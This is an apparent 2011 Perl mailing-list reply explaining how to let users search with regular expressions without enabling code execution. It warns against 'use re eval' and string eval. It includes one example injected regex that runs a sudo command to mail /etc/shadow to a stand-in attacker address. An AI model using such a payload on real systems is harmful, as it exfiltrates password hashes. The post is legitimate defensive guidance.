Re: regexp validation (arbitrary code execution) (regexp injection)



On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
Suppose you have a collection of books, and want to provide your users
with the ability to search the book title, author or content using
regular expressions.

But you don't want to let them execute any code.

How would you validate/compile/evaluate the user provided regex so as to
provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

use re "eval";

$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
"hello" })/ at -e line 1.

$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
hello

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" ])'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.

--
Paul Johnson - paul@xxxxxxxx
http://www.pjcj.net
.